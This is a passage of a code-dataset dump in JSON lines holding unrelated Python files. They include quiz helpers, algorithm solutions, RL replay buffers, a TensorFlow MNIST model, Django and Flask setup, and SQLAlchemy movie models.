exit_cond(string):\n return None\n\n if string in char_list:\n return string\n\ndef get_number(s, max_val=None):\n\n while( True ):\n try:\n string = input(s)\n if exit_cond(string):\n return None\n val = int(string)\n if max_val is None or val <= max_val:\n return val\n except:\n print ('Not a number. Try again')\n \ndef get_string(s):\n string = input(s)\n if exit_cond(string):\n return None\n return string\n\ndef get_word(s):\n string = input(s)\n if exit_cond(string):\n return False\n return True\n\ndef ask_addition_question(m, n):\n for i in range(1, 4):\n result = get_number(str(m) + ' + ' + str(n) + ' = ')\n if result == None:\n return -1\n \n if result == (m+n):\n print ('Correct !')\n return 1\n else:\n print ('Wrong. try again!')\n \n return 0\n \ndef ask_multiplication_question(m, n):\n for i in range(1, 4):\n result = get_number(str(m) + ' x ' + str(n) + ' = ')\n if result == None:\n return -1\n \n if result == (m*n):\n print ('Correct !')\n return 1\n else:\n print ('Wrong. try again!')\n \n return 0\n \ndef ask_subtraction_question(m, n):\n for i in range(1, 4):\n if m < n:\n m, n = n, m\n result = get_number(str(m) + ' - ' + str(n) + ' = ')\n if result == None:\n return -1\n \n if result == (m-n):\n print ('Correct !')\n return 1\n else:\n print ('Wrong. try again!')\n \n return 0\n \ndef ask_word_question(word):\n return get_word(' ' + word + ' ')\n\ndef write(text, color=None, *attrib):\n\n prefix = ''\n sufix = ''\n if not color is None:\n prefix += colors[color.upper()]\n for at in attrib:\n prefix += attribs[at.upper()]\n \n if len(prefix) > 0:\n sufix = colors['NONE']\n\n print (prefix + text + sufix)\n \n","sub_path":"math/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614217004","text":"# 2579.py\n# 2018.05.27\n\nimport sys\n\nr = sys.stdin.readline\n\ndef cal(p, p_len):\n\tif p_len < 3:\n\t\treturn sum(p)\n\tdp = [0, p[1], p[1]+p[2]]\n\tfor n in range(3, p_len+1):\n\t\tn_val = max(dp[n-2] + p[n], dp[n-3] + p[n-1] + p[n])\n\t\tdp.append(n_val)\n\treturn dp[p_len]\n\nn = int(r())\np = [0] + [int(r()) for _ in range(n)]\nrst = cal(p, n)\nprint(rst)\n\n# dp[n] : N개의 계단이 있을 때, 계단 오르기 게임에서 얻을 수 있는 총 점수의 최대값\n# dp[n] = max(dp[n-2]+p[n], dp[n-3]+p[n-1]+p[n])\n\n","sub_path":"2000/2579.py","file_name":"2579.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"502790102","text":"\ndef cycles(start, graph):\n visited = [0] * (graph.no_nodes+1)\n pred = [0] * (graph.no_nodes+1)\n det_cycle(start, graph, visited, pred)\n\n\ndef det_cycle(start, graph, visited, pred):\n visited[start] = 1\n for i in graph.a[start]:\n if visited[i] == 0:\n pred[i] = start\n det_cycle(i, graph, visited, pred)\n visited[i] = 2\n elif i != pred[start] and visited[i] != 2:\n write_cycle(start, i, pred)\n\n\ndef write_cycle(p, c, pred):\n\n cycle = [p]\n node = p\n while c != node:\n node = pred[node]\n cycle.append(node)\n\n print(cycle)\n","sub_path":"resources/determine_cycles.py","file_name":"determine_cycles.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"107062756","text":"from ui.OptionUI import OptionUI\nfrom controllers.MemberController import member_controller\nfrom controllers.MemberController import ORDER_BY_NAME, ORDER_BY_SPORT, ORDER_BY_AGE\nfrom ui.MemberSelectUI import MemberSelectUI\n\nclass ListAllMembersUI(OptionUI):\n\n def __init__(self):\n super().__init__(\"List all members\")\n\n def options(self):\n return [self.ListMembersByOrder(ORDER_BY_NAME, \"name\"), \n self.ListMembersByOrder(ORDER_BY_AGE, \"age\"), \n self.ListMembersByOrder(ORDER_BY_SPORT, \"sport\")]\n\n class ListMembersByOrder(OptionUI):\n\n def __init__(self, number, order_str):\n super().__init__(f\"Order by {order_str}\")\n self.number = number\n\n def options(self):\n members = member_controller.get_all_members(self.number)\n ret = []\n for member in members:\n if isinstance(member[1], list):\n for memb in member[1]:\n ret.append(MemberSelectUI(memb, str(member[0])))\n else:\n ret.append(MemberSelectUI(member[1], str(member[0])))\n return ret\n\n\n\n","sub_path":"ui/ListAllMembersUI.py","file_name":"ListAllMembersUI.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"145917053","text":"import numpy as np\r\nimport random\r\nfrom config import *\r\nfrom utils import SumTree\r\nimport torch\r\nimport bisect\r\n\r\n\r\nclass ReplayBuffer(object):\r\n def __init__(self, capacity, batch_size=64):\r\n self.capacity = capacity\r\n self.memory = [None for _ in range(capacity)]\r\n self.ind_max = 0\r\n\r\n def remember(self, transition):\r\n ind = self.ind_max % self.capacity\r\n self.memory[ind] = transition\r\n self.ind_max += 1\r\n\r\n def sample(self, k):\r\n '''\r\n return sampled transitions. Make sure that there are at least k transitions stored before calling this method\r\n '''\r\n index_set = random.sample(list(range(len(self))), k)\r\n states = torch.from_numpy(np.vstack([self.memory[ind][0] for ind in index_set])).float()\r\n actions = torch.from_numpy(np.vstack([self.memory[ind][1] for ind in index_set])).long()\r\n rewards = torch.from_numpy(np.vstack([self.memory[ind][2] for ind in index_set])).float()\r\n next_states = torch.from_numpy(np.vstack([self.memory[ind][3] for ind in index_set])).float()\r\n dones = torch.from_numpy(np.vstack([self.memory[ind][4] for ind in index_set]).astype(np.uint8)).float()\r\n\r\n return states, actions, rewards, next_states, dones\r\n\r\n def __len__(self):\r\n return min(self.ind_max, self.capacity)\r\n\r\n\r\nclass ProportionalReplayBuffer(object):\r\n def __init__(self, capacity, batch_size=64):\r\n \"\"\"\r\n 初始化一个Proportional的ReplayBuffer类,需要存储需要的transition,记录各个transition的TD-error,定义Alpha,\r\n :param capacity: ReplayBuffer的容量大小\r\n :param batch_size: 从ReplayBuffer中抽样出来的batch_size的大小\r\n \"\"\"\r\n self.alpha = ALPHA\r\n self.epsilon = EPSILON\r\n self.capacity = capacity\r\n self.memory = [None for _ in range(capacity)]\r\n self.tree = SumTree(self.capacity)\r\n self.max_index = 0\r\n self.default_delta = TD_INIT\r\n self.batch_size = batch_size\r\n\r\n def remember(self, transition):\r\n \"\"\"\r\n :param state:\r\n :param action:\r\n :param reward:\r\n :param next_state:\r\n :param done:\r\n :return:\r\n \"\"\"\r\n index = self.max_index % self.capacity\r\n self.memory[index] = transition\r\n # delta = max(self.tree.nodeVal[-self.capacity:])\r\n # if delta == 0:\r\n # delta = self.default_delta\r\n delta = self.default_delta + EPSILON - self.tree.nodeVal[index + self.capacity - 1]\r\n self.tree.update(delta, index)\r\n self.max_index += 1\r\n\r\n def sample(self, batch_size):\r\n \"\"\"\r\n 根据batch_size的大小均匀采样到各个区间,但区间的长度不一样,很显然,区间长度更大的叶子结点在SumTree中更容易被所索引到\r\n :return: 返回所有采样到的内容\r\n \"\"\"\r\n index_set = [self.tree.retrieve(self.tree.nodeVal[0] * random.random()) for _ in range(batch_size)]\r\n probs = torch.from_numpy(\r\n np.vstack([self.tree.nodeVal[ind + self.capacity - 1] / self.tree.nodeVal[0] for ind in index_set])).float()\r\n states = torch.from_numpy(np.vstack([self.memory[ind][0] for ind in index_set])).float()\r\n actions = torch.from_numpy(np.vstack([self.memory[ind][1] for ind in index_set])).long()\r\n rewards = torch.from_numpy(np.vstack([self.memory[ind][2] for ind in index_set])).float()\r\n next_states = torch.from_numpy(np.vstack([self.memory[ind][3] for ind in index_set])).float()\r\n dones = torch.from_numpy(np.vstack([self.memory[ind][4] for ind in index_set]).astype(np.uint8)).float()\r\n\r\n return index_set, states, actions, rewards, next_states, dones, probs\r\n\r\n def insert(self, delta, index):\r\n change = (delta + self.epsilon) ** self.alpha - self.tree.nodeVal[index + self.capacity - 1]\r\n self.tree.update(change, index)\r\n\r\n def __len__(self):\r\n return min(self.capacity, self.max_index)\r\n\r\n\r\nclass RankedReplayBuffer(object):\r\n def __init__(self, capacity, batch_size=64):\r\n \"\"\"\r\n 初始化一个RankedReplayBuffer,需要顶一个TD-error的有序数组,定义一个segments用于划分区间,total_error用于累加所有error,\r\n cumulative_errors用于将各个各个阶段的累加error存储起来并用于划分segments\r\n :param capacity: ReplayBuffer的容量大小\r\n :param batch_size: 从ReplayBuffer中抽样出来的batch_size的大小\r\n \"\"\"\r\n self.alpha = ALPHA\r\n self.epsilon = EPSILON\r\n self.capacity = capacity\r\n self.memory = [None for _ in range(self.capacity)]\r\n self.max_index = 0\r\n self.default_delta = 1.\r\n self.batch_size = batch_size\r\n self.total_error = 0.\r\n self.cumulative_weights = []\r\n self.errors = []\r\n self.memory_to_rank = [None for _ in range(self.capacity)]\r\n self.segments = [-1] + [None for _ in range(self.batch_size)]\r\n\r\n def remember(self, transition):\r\n \"\"\"\r\n 更新ReplayBuffer,原则是轮番剔除插入,将新的transition插入进来,原则是将对应位置的TD-error替换成当前erros有序数组中最大\r\n 的那个error,然后将error重新排序,同时保存好排序后每个error对应的index\r\n :param transition: transition包含state, action, reward, next_state, done, 需要存储到响应的ReplayBuffer的Memory中\r\n \"\"\"\r\n index = self.max_index % self.capacity\r\n if self.max_index < self.capacity: # 当memory中的transition没存满的时候\r\n self.total_error = (1 / (self.max_index + 1)) ** self.alpha\r\n self.cumulative_weights.append(self.total_error)\r\n self.update_segments()\r\n else:\r\n self.pop(index)\r\n\r\n self.memory[index] = transition\r\n max_error = -self.errors[0][0]\r\n self.insert(max_error, index)\r\n self.max_index += 1\r\n\r\n def pop(self, index):\r\n idx = self.memory_to_rank[index]\r\n self.errors.pop(idx)\r\n self.memory_to_rank[index] = None\r\n for i in range(idx, len(self.errors)):\r\n self.memory_to_rank[self.errors[idx][1]] -= 1\r\n\r\n def insert(self, error, index):\r\n sort_idx = bisect.bisect_left(self.errors, (-error, index))\r\n self.memory_to_rank[index] = sort_idx\r\n self.errors.insert(sort_idx, (-error, index))\r\n for i in range(sort_idx + 1, len(self.errors)):\r\n self.memory_to_rank[self.errors[sort_idx][1]] += 1\r\n\r\n def update_segments(self):\r\n if self.max_index + 1 < self.batch_size:\r\n return None\r\n for i in range(self.batch_size):\r\n sort_index = bisect.bisect_left(self.cumulative_weights, self.total_error * ((i + 1) / self.batch_size))\r\n self.segments[i] = max(sort_index, self.segments[i] + 1)\r\n\r\n def sample(self):\r\n index_list = [random.randint(self.segments[i] + 1, self.segments[i + 1]) for i in range(self.batch_size)]\r\n probs = torch.from_numpy(\r\n np.vstack([(1 / 1 + index) ** self.alpha / self.total_error for index in index_list])).float()\r\n index_list = [self.errors[index][1] for index in index_list]\r\n\r\n states = torch.from_numpy(np.vstack([self.memory[index][0] for index in index_list])).float()\r\n actions = torch.from_numpy(np.vstack([self.memory[index][1] for index in index_list])).long()\r\n rewards = torch.from_numpy(np.vstack([self.memory[index][2] for index in index_list])).float()\r\n next_states = torch.from_numpy(np.vstack([self.memory[index][3] for index in index_list])).float()\r\n dones = torch.from_numpy(np.vstack([self.memory[index][4] for index in index_list])).float()\r\n\r\n return index_list, probs, states, actions, rewards, next_states, dones\r\n","sub_path":"03_C51/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333137601","text":"from __future__ import absolute_import,print_function,division\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '2'\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\n\n\n\n\nclass q2b_model:\n def __init__(self):\n self.learning_rate = 5e-4\n self.batch_size = 128\n self.keep_prob = tf.constant(0.2)\n self.num_class = 10\n self.num_test = 10000\n self.training = True\n def _get_data(self):\n with tf.variable_scope(\"data\"):\n trainset, testset = utils.get_mnist_dataset(self.batch_size)\n iterator = tf.data.Iterator.from_structure(trainset.output_types,\n trainset.output_shapes)\n self.img, self.labels = iterator.get_next()\n self.train_init = iterator.make_initializer(trainset)\n self.test_init = iterator.make_initializer(testset)\n def _create_model(self):\n with tf.variable_scope(\"model\"):\n dense1 = tf.layers.dense(inputs=self.img,\n units=400,\n\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n relu1 = tf.nn.relu(dense1)\n dropout1 = tf.layers.dropout(inputs=relu1,\n rate=self.keep_prob,\n training=self.training)\n dense2 = tf.layers.dense(inputs=dropout1,\n units=200,\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n relu2 = tf.nn.relu(dense2)\n dropout2 = tf.layers.dropout(inputs=relu2,\n rate=self.keep_prob,\n training=self.training)\n self.logits = tf.layers.dense(inputs=dropout2,\n units=self.num_class)\n\n entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,\n labels=self.labels)\n self.loss = tf.reduce_mean(entropy)\n with tf.variable_scope(\"predict\"):\n pred = tf.nn.softmax(self.logits)\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(self.labels, 1))\n self.accuracy = tf.reduce_sum(tf.cast(correct_pred, tf.float32))\n def _create_optimizer(self):\n with tf.variable_scope(\"optimizer\"):\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n def _create_summaries(self):\n with tf.variable_scope(\"summaries\"):\n tf.summary.scalar(\"loss\", self.loss)\n tf.summary.histogram(\"histogram_loss\", self.loss)\n self.summary_op = tf.summary.merge_all()\n\n def build_graph(self):\n self._get_data()\n self._create_model()\n self._create_optimizer()\n self._create_summaries()\n def train(self, num_epochs):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n writer = tf.summary.FileWriter(\"graphs/q2b/\",sess.graph)\n sess.run(tf.global_variables_initializer())\n ckpt = tf.train.get_checkpoint_state(\"checkpoints/q2b/\")\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"restore existed model parameters\", ckpt.model_checkpoint_path)\n for i in range(num_epochs):\n sess.run(self.train_init)\n self.training = True\n try:\n while True:\n batch_loss, _, summaries = sess.run([self.loss, self.optimizer, self.summary_op])\n writer.add_summary(summaries, global_step=i)\n except tf.errors.OutOfRangeError:\n pass\n sess.run(self.test_init)\n self.training = False\n acc = 0\n try:\n while True:\n acc += sess.run(self.accuracy)\n except tf.errors.OutOfRangeError:\n pass\n saver.save(sess, \"checkpoints/q2b/q2b\",i)\n print(\"epochs at\", i+1, \"Accuracy of this testset:\", acc/self.num_test)\n writer.close()\nif __name__ == \"__main__\":\n model = q2b_model()\n model.build_graph()\n model.train(100)\n","sub_path":"assignments/01/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"99566630","text":"from users import views\n\nfrom blogster.imports.CommanImportsForUrl import *\nfrom blogster.ViewsListMap import * \n\nurlpatterns = [\n path('',BloggerDashboard.as_view(), name='dashboard'),\n path('/setting',DashboardSettings.as_view(), name='dashboard-setting'),\n path('/Update', UpdateBlogger.as_view(), name='updateblogger'),\n # path('/sociallinksupdate', Update_social_media_urls.as_view(), name='updatebloggersociallinks'),\n path('/Delete', DeleteBlogger.as_view(), name='deleteblogger'),\n # path('/Manage-SEO', Update_Blogger_SE0.as_view(), name='manage_blogger_seo'),\n# path('/personal-link', Update_personal_website_link.as_view(), name='updatebloggerpersonallinks'),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"Bloggers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"568088940","text":"#-*- coding:utf-8 -*-\n# @time: \n# @author:张新新\n# @email: 1262981714@qq.com\nimport numpy as np\ndef get_imgpoint_depth(imgpoints,objpoints,depth_img):\n \"\"\"\n 获取图片对应点的深度值,注意rgb图片要与深度图片align\n :param imgpoints:\n :param depth_img:\n :return:\n \"\"\"\n objPoint_acc = np.array([])\n depth_point_acc = np.array([])\n imgPoint_acc = np.array([])\n n = imgpoints.shape[0]\n for j in range(n):\n depth = depth_img[int(imgpoints[j, 1]), int(imgpoints[j, 0])] / 1000.0\n if depth == 0:\n continue\n objPoint_acc = np.append(objPoint_acc, objpoints[j, :])\n imgPoint_acc = np.append(imgPoint_acc, imgpoints[j, :])\n\n # depth_point_acc = np.append(depth_point_acc,Point_cam_cood[i,:])\n depth_point_acc = np.append(depth_point_acc, depth)\n objPoint_acc = objPoint_acc.reshape([-1, 2])\n imgPoint_acc = imgPoint_acc.reshape([-1, 2])\n depth_point_acc = depth_point_acc.reshape([-1, 1])\n return imgPoint_acc, objPoint_acc, depth_point_acc","sub_path":"calibration_utils/depth_utils.py","file_name":"depth_utils.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"595599539","text":"from django.urls import path\nfrom .views import (PostDetailView, PostCreateView, \n PostUpdateView, PostDeleteView\n , SearchView)\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name=\"blog-home\"),\n path('about/', views.about, name=\"blog-about\"),\n path('post/new', PostCreateView.as_view(), name=\"post-create\"),\n path('post/', PostDetailView.as_view(), name=\"blog-detail\"),\n path('post//delete', PostDeleteView.as_view(), name=\"post-delete\"),\n path('post//update', PostUpdateView.as_view(), name=\"post-update\"),\n path('search/', SearchView.as_view(template_name=\"blog/search.html\"), name=\"search\")\n \n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"101828373","text":"def solution(arr, divisor):\n answer = []\n\n for num in arr:\n if num % divisor == 0:\n answer.append(num)\n\n if len(answer) == 0:\n answer.append(-1)\n\n answer.sort()\n return answer\n\n\nsolution([5, 9, 7, 10], 5) # [5,10]\nsolution([2, 36, 1, 3], 1) # [1,2,3,36]\nsolution([3, 2, 6], 10) # [-1]\n","sub_path":"PYTHON/PROGRAMMERS/LEVEL1/나누어_떨어지는_숫자_배열.py","file_name":"나누어_떨어지는_숫자_배열.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49825360","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 28 14:34:05 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nX = np.array([0 , 4, 10, 15, 21, 29, 36, 51, 68,100])\ny = np.array([[66.7, 71.0, 76.3, 80.6, 85.7, 92.9, 99.4, 113.6, 125.1,140]])\nX_T=np.ones(len(X)).astype(dtype=np.int)\nX_new=np.array([X_T,X])\ntemp=np.matrix(np.dot(X_new,X_new.T))\nans= temp ** -1 * X_new * y.T\nintercept=np.array(ans)[0][0]\ncoef=np.array(ans)[1][0]\nlx=np.arange(0,100)\nly=coef*lx+intercept\nplt.figure(figsize=(5,6))\nplt.title('normal equation')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.scatter(X,y,color='b')\nplt.plot(lx,ly,color='g')\n","sub_path":"others/normal_equation.py","file_name":"normal_equation.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"234174305","text":"from collections import deque\n\nfrom loader import Matrix2D\n\nfrom .inner_edge_optimizer import LocalInnerEdgeOptimizer\nfrom .base import TimerOptimizer, Route, Solution, Optimizer\nimport numpy as np\nimport random\n\n\nclass RandomOptimizer(TimerOptimizer):\n def _find_solution(self):\n best_solution = Solution(np.inf, self.route)\n route: Route = self.route[:]\n\n while True:\n random.shuffle(route)\n\n score = self._calculate_score(route)\n if score < best_solution.cost:\n best_solution = Solution(score, route[:])\n\n yield best_solution\n\n\nclass MultiStartLocalSearchOptimizer(Optimizer):\n\n def __init__(self, distance_matrix: Matrix2D, route: Route):\n super().__init__(distance_matrix, route)\n self.n_iter = 20\n\n def _search(self) -> Solution:\n best_solution = Solution(np.inf, self.route)\n route: Route = self.route[:]\n\n for _ in range(self.n_iter):\n random.shuffle(route)\n opt = LocalInnerEdgeOptimizer(self.distance_matrix, route)\n sol = opt()\n\n if sol.cost < best_solution.cost:\n best_solution = Solution(sol.cost, sol.route[:])\n\n return best_solution\n","sub_path":"p5/optimizers/random_optimizer.py","file_name":"random_optimizer.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477228300","text":"from .Conn import db\n\n#Establishes table schema as classes and determines the methods that contains the data note the foreign keys it means there needs to be a specific order things are added to the database\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False)\n year = db.Column(db.Integer, nullable=False)\n runtime = db.Column(db.Integer, nullable=False)\n mov_rel_dt = db.Column(db.Date, nullable=False)\n mov_plot = db.Column(db.String(450))\n ratings = db.relationship('Ratings', backref='Movie', lazy=True)\n Cast = db.relationship('Actors', secondary='movie_cast' )\n mov_writers = db.relationship('Writer', secondary='movie_writers')\n mov_genres = db.relationship('Genre', secondary='movie_genres' )\n languages = db.relationship('Lang', secondary='movie_lang')\n countries = db.relationship('Release_Country', secondary = 'movie_release_country')\n movie_std = db.relationship('Studio', secondary = 'movie_studios')\n movie_director = db.relationship('Directors', secondary = 'movie_directors')\n def __init__(self, title, year, runtime, mov_rel_dt, mov_plot):\n self.title = title\n self.year = year\n self.runtime = runtime\n self.mov_rel_dt = mov_rel_dt\n self.mov_plot = mov_plot\n \n\nclass Directors(db.Model):\n __tablename__ = 'directors'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesd = db.relationship('Movie', secondary='movie_directors')\n def __init__(self, name):\n self.name = name\n\nclass Genre(db.Model):\n __tablename__ = 'genre'\n id = db.Column(db.Integer, primary_key=True)\n genre = db.Column(db.String(50), unique=True, nullable=False)\n moviesg = db.relationship(\"Movie\", secondary=\"movie_genres\")\n def __init__(self, genre):\n self.genre = genre\n\nclass Actors(db.Model):\n __tablename__ = 'actors'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesa = db.relationship(\"Movie\", secondary=\"movie_cast\")\n def __init__(self, name):\n self.name = name\n\nclass Studio(db.Model):\n __tablename__ = 'studio'\n id = db.Column(db.Integer, primary_key=True)\n studioname = db.Column(db.String(50), unique=True, nullable=False)\n moviess = db.relationship(\"Movie\", secondary=\"movie_studios\")\n def __init__(self, studioname):\n self.studioname = studioname\n\nclass Ratings(db.Model):\n __tablename__ = 'ratings'\n id = db.Column(db.Integer, primary_key=True)\n movie_id = db.Column(db.Integer, db.ForeignKey('movies.id'), nullable=False)\n outlet = db.Column(db.String(50), nullable=False)\n score = db.Column(db.Float(15), nullable=False)\n def __init__(self, movie_id, outlet, score):\n self.movie_id = movie_id\n self.outlet = outlet\n self.score = score\n\nclass Writer(db.Model):\n __tablename__ = 'writer'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesw = db.relationship(\"Movie\", secondary=\"movie_writers\")\n def __init__(self, name):\n self.name = name\n\nclass Movie_Cast(db.Model):\n __tablename__ = 'movie_cast'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n actors_id = db.Column(db.Integer, db.ForeignKey('actors.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_cast', cascade=\"all, delete-orphan\"))\n actor = db.relationship(Actors, backref=db.backref('movie_cast', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, actors_id):\n self.movies_id = movies_id\n self.actors_id = actors_id\n\nclass Movie_Directors(db.Model):\n __tablename__ = 'movie_directors'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n director_id = db.Column(db.Integer, db.ForeignKey('directors.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_directors', cascade=\"all, delete-orphan\"))\n director = db.relationship(Directors, backref=db.backref('movie_directors', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, director_id):\n self.movies_id = movies_id\n self.director_id = director_id\n\nclass Movie_Writers(db.Model):\n __tablename__ = 'movie_writers'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n writer_id = db.Column(db.Integer, db.ForeignKey('writer.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_writers', cascade=\"all, delete-orphan\"))\n writer = db.relationship(Writer, backref=db.backref('movie_writer', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, writer_id):\n self.movies_id = movies_id\n self.writer_id = writer_id\n\nclass Movie_Genres(db.Model):\n __tablename__ = 'movie_genres'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n genre_id = db.Column(db.Integer, db.ForeignKey('genre.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_genres', cascade=\"all, delete-orphan\"))\n genre = db.relationship(Genre, backref=db.backref('movie_genres', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, genre_id):\n self.movies_id = movies_id\n self.genre_id = genre_id\n\nclass Release_Country(db.Model):\n __tablename__ = 'country'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(74))\n moviesrc = db.relationship(\"Movie\", secondary=\"movie_release_country\")\n def __init__(self, name):\n self.name = name\n\nclass Movie_Rel_Country(db.Model):\n __tablename__ = 'movie_release_country'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n country_id = db.Column(db.Integer,db.ForeignKey('country.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_release_country', cascade=\"all, delete-orphan\"))\n country = db.relationship(Release_Country, backref=db.backref('movie_release_country', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, country_id):\n self.movies_id = movies_id\n self.country_id = country_id\n\nclass Lang(db.Model):\n __tablename__ = 'languages'\n id = db.Column(db.Integer, primary_key=True)\n language = db.Column(db.String(85), nullable=False)\n moviesl = db.relationship(\"Movie\", secondary=\"movie_lang\")\n def __init__(self, language):\n self.language = language\n\nclass Movie_Lang(db.Model):\n __tablename__ = 'movie_lang'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n language_id = db.Column(db.Integer, db.ForeignKey('languages.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_lang', cascade=\"all, delete-orphan\"))\n lang = db.relationship(Lang, backref=db.backref('movie_lang', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, language_id):\n self.movies_id = movies_id\n self.language_id = language_id\n\nclass Movie_Studio(db.Model):\n __tablename__ = 'movie_studios'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n studio_id = db.Column(db.Integer, db.ForeignKey('studio.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_studios', cascade=\"all, delete-orphan\"))\n studio = db.relationship(Studio, backref=db.backref('movie_studios', cascade=\"all, delete-orphan\"))\n def __init__(self,movies_id,studio_id):\n self.movies_id = movies_id\n self.studio_id = studio_id","sub_path":"OMDB/backend/src/entities/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"70925758","text":"from flask import Flask\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\n#from flask_script import Manager\nfrom flask_migrate import Migrate #, MigrateCommand\nfrom flask_login import LoginManager\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_mail import Mail\nimport logging\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_uploads import UploadSet, ARCHIVES, configure_uploads, IMAGES\nimport os\nfrom redis import Redis\nimport rq\n\n'''\nWhat we need to add to this application...\nHome page - see upload form that encoorporates date used to save files in new folder.\nPath saved in database , given a file ID which is connected to the user. \n\nThen that file is passed through the 'scriptts.py' which will then process the images\n\nOutput.py template will then be rendered with results...\n\nResults.py will be logged on the user's profile page, \nThere will be a relational database of outputs connected to each uploaded zip folder. \n\nHome will show the completeness of laboratory tests. w/ downloadable zip folders \nof all output data for that test...\n\n'''\nbootstrap = Bootstrap() #Bootstrap uses three level hiearchy...\nlogin = LoginManager()\nlogin.login_view = 'auth.login' #function or endpoint name for login view\nmail = Mail()\n\ndb = SQLAlchemy() ##this object represents the database\nmigrate = Migrate() ##this object represents the migration engine\n#manager = Manager()\nmoment = Moment()\n\napp= Flask(__name__)\nphotos = UploadSet('photos', IMAGES)\narchives = UploadSet('archives', ARCHIVES)\n#files = UploadSet('files', FILES)\n\ndef create_app(config_class=Config):\n \n app = Flask(__name__)\n app.config.from_object(config_class)\n \n app.config['UPLOADED_PHOTOS_DEST'] = 'static/img/'\n configure_uploads(app, photos)\n \n app.config['UPLOADED_ARCHIVES_DEST'] = 'static/arch/'\n configure_uploads(app, archives)\n \n # create the folders when setting up your app\n app.config['IMG_PICKED'] = 'static/picked/'\n \n # create the folders when setting up your app\n app.config['TO_DOWNLOAD'] = 'static/to-download/'\n \n\n 